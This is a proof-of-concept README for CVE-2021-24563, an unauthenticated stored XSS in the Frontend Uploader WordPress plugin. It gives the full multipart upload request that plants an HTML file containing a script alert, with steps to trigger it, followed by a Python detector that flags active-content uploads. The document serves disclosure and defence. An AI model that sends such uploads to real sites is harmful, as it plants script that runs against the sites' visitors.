
CVE-2021-24563 PoC — Frontend Uploader <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting

Associated Vulnerability
Title: Frontend Uploader <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting (CVE-2021-24563)
Description: The Frontend Uploader WordPress plugin through 1.3.2 does not prevent HTML files from being uploaded via its form, allowing an unauthenticated user to upload a malicious HTML file (containing JavaScript, for example), which will be triggered when someone accesses the file directly.
Readme
# CVE-2021-24563
Frontend Uploader <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting

The plugin does not prevent HTML files from being uploaded via its form, allowing an unauthenticated user to upload a malicious HTML file (containing JavaScript, for example), which will be triggered when someone accesses the file directly.

# Proof of Concept

In a page or post where the [fu-upload-form] shortcode is embedded, simply upload an HTML file via the generated form. The request the form sends looks like this:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654
Content-Length: 1396
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_ID"

1247
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_title"

test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_content"

test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="files[]"; filename="xss.html"
Content-Type: text/html

<script>alert(/XSS/)</script>
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="action"

upload_ugc
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_layout"

image
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="fu_nonce"

021fb612f9
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/frontend-uploader-form/
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="ff"

92b6cbfa6120e13ff1654e28cef2a271
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_post_id"

1247
-----------------------------124662954015823207281179831654--
```

Then access the uploaded file to trigger the XSS, e.g. https://example.com/wp-content/uploads/2021/07/xss.html
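As an added example (not part of this PoC or of the plugin), the following Python check parses a raw multipart upload request of the shape shown above and flags every file part a browser would render as active content when served straight from wp-content/uploads, which is the kind of rule a defender would put in a WAF or run over captured traffic. The sample request is constructed to mirror the PoC request; the function and constant names are this example's own.

```python
import re

# File types a browser renders as an active document when fetched straight from uploads.
ACTIVE_EXTS = {"html", "htm", "xhtml", "shtml", "svg"}
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml"}
SCRIPT_MARKERS = ("<script", "javascript:", "onerror=", "onload=")

def iter_parts(body: str, boundary: str):
    """Yield (name, filename, content_type, data) for each multipart/form-data part."""
    for chunk in body.split("--" + boundary)[1:]:
        if chunk.startswith("--"):  # "--boundary--" closes the body
            break
        head, _, data = chunk[2:].partition("\r\n\r\n")  # every chunk begins with CRLF
        name = re.search(r'(?<!file)name="([^"]*)"', head)
        fname = re.search(r'filename="([^"]*)"', head)
        ctype = re.search(r"(?im)^content-type:\s*([^;\r\n]+)", head)
        yield (name.group(1) if name else "", fname.group(1) if fname else None,
               ctype.group(1).strip().lower() if ctype else None, data[:-2] if data.endswith("\r\n") else data)

def audit_upload(raw_request: bytes) -> dict:
    """Return the form action plus every file part a browser would run as active content."""
    head, _, body = raw_request.decode("latin-1").partition("\r\n\r\n")
    m = re.search(r'(?im)^content-type:.*boundary="?([^;"\r\n]+)', head)
    result = {"action": None, "findings": []}
    if not m:
        return result  # not a multipart request, nothing to inspect
    for name, fname, ctype, data in iter_parts(body, m.group(1)):
        if fname is None:
            if name == "action":
                result["action"] = data  # e.g. upload_ugc for the Frontend Uploader form
            continue
        reasons = []
        if fname.rsplit(".", 1)[-1].lower() in ACTIVE_EXTS:
            reasons.append("extension")
        if ctype in ACTIVE_TYPES:
            reasons.append("content-type")
        if any(mark in data[:4096].lower() for mark in SCRIPT_MARKERS):
            reasons.append("script-marker")  # also catches files renamed to dodge the list
        if reasons:
            result["findings"].append({"field": name, "filename": fname, "reasons": reasons})
    return result

B = "---------------------------124662954015823207281179831654"  # boundary from the PoC request
SAMPLE = (  # constructed sample modelled on the PoC request above, not a real capture
    f"POST /wp-admin/admin-ajax.php HTTP/1.1\r\nContent-Type: multipart/form-data; boundary={B}\r\n\r\n"
    f'--{B}\r\nContent-Disposition: form-data; name="post_title"\r\n\r\ntest\r\n'
    f'--{B}\r\nContent-Disposition: form-data; name="files[]"; filename="photo.jpg"\r\nContent-Type: image/jpeg\r\n\r\n\xff\xd8\xff\xe0JFIF\r\n'
    f'--{B}\r\nContent-Disposition: form-data; name="files[]"; filename="xss.html"\r\nContent-Type: text/html\r\n\r\n<script>alert(/XSS/)</script>\r\n'
    f'--{B}\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload_ugc\r\n--{B}--\r\n'
).encode("latin-1")
```

Running `audit_upload(SAMPLE)` reports the action `upload_ugc` and a single finding for `xss.html` (extension, content type and embedded script), while the JPEG part passes.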
# Video POC:
https://www.youtube.com/watch?v=lfrLoHl4-Zs